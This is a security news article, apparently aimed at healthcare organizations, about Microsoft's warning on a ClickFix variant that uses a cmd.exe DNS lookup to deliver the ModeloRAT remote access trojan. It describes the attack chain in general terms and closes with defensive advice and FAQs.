Microsoft warns of new ClickFix variant

Microsoft has flagged a new ClickFix attack variant that uses DNS lookups to deliver a remote access trojan called ModeloRAT to targeted users.

What happened

Microsoft warned users that threat actors are using an evolved version of the ClickFix attack technique to deliver malware through a custom DNS lookup command. In this variant, attackers display a fake error message on a compromised or malicious site, instructing targets to run a command through cmd.exe. That command performs a DNS lookup against a hard-coded external DNS server, bypassing the system's default resolver. The DNS response is then filtered and executed as a second-stage payload. That payload downloads a malicious Python reconnaissance script, drops a final payload, and installs a persistence mechanism. The final payload is ModeloRAT, a remote access trojan that collects system information and can execute additional payloads on the compromised machine.

The backstory

ClickFix is a social engineering attack technique in which a threat actor presents a fake error message on a website, instructing users to follow steps that seem like legitimate troubleshooting. First observed in early 2024, the technique has become popular among both cybercriminal groups and state-sponsored threat actors. ClickFix attacks surged 517% in the first half of 2025, accounting for nearly 8% of all blocked attacks in that period and making it the second most common attack vector behind only phishing.

According to an October 2024 Sector Alert from the HHS Health Sector Cybersecurity Coordination Center (HC3), ClickFix campaigns have targeted healthcare organizations through a range of vectors, including compromised websites, phishing emails, and fake software pages. In one notable campaign, threat actors used fake Google Meet video conference pages to display false error messages about microphone and headset problems, tricking users into executing malicious code that installed infostealers on both Windows and macOS systems.

Going deeper

By routing the second-stage payload through a DNS response rather than a direct download, attackers blend malicious traffic into normal network activity. The command specifically queries a hard-coded external DNS server rather than the system's default resolver, meaning standard DNS monitoring tools may not flag the lookup. This approach also allows attackers to validate whether the second stage was actually executed before proceeding, making the attack more precise and harder to detect mid-chain.

What was said

Microsoft explained that, "the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver. The output is filtered to extract the 'Name:' DNS response, which is executed as the second-stage payload."

Microsoft noted this tactic "enables the attacker to reach their infrastructure and validate execution of the second-stage payload, increasing their chances of evading detection by blending malicious traffic into regular network traffic."

Why it matters

This variant matters because it weaponizes DNS as a malware delivery mechanism. Healthcare organizations, which depend on networked systems and often lack network-layer monitoring, are exposed. A successful ModeloRAT infection gives attackers persistent access to systems that may store or transmit protected health information. Because the attack relies on a user following what looks like a routine technical instruction, it bypasses many endpoint defenses that focus on file downloads or known malicious URLs. The validation step built into the DNS lookup also means attackers know when they've successfully landed, allowing them to move quickly before detection.

The bottom line

The evolution of ClickFix into DNS-based delivery shows that attackers are actively refining social engineering techniques to stay ahead of defenses. Organizations should train users to recognize fake error prompts and never run commands from browser-based instructions. Network teams should audit DNS traffic for queries routed to external resolvers rather than internal ones, as this pattern may indicate an active ClickFix-style attack in progress.

FAQs

How would a user visually distinguish a fake ClickFix error from a legitimate browser or system error?

Legitimate system errors never instruct users to manually run commands or press keyboard shortcuts to resolve an issue.

What should healthcare employees do if they see an unexpected error message on a website asking them to run a command?

Close the browser immediately and report it to your IT or security team without following any of the instructions.

What should a healthcare IT team do if they suspect ModeloRAT has already infected a machine?

Isolate the device from the network immediately to prevent further access or lateral movement.

How can healthcare organizations train staff to recognize a ClickFix attack?

Regular security awareness training that includes real examples of fake error messages can help employees recognize and avoid this type of social engineering.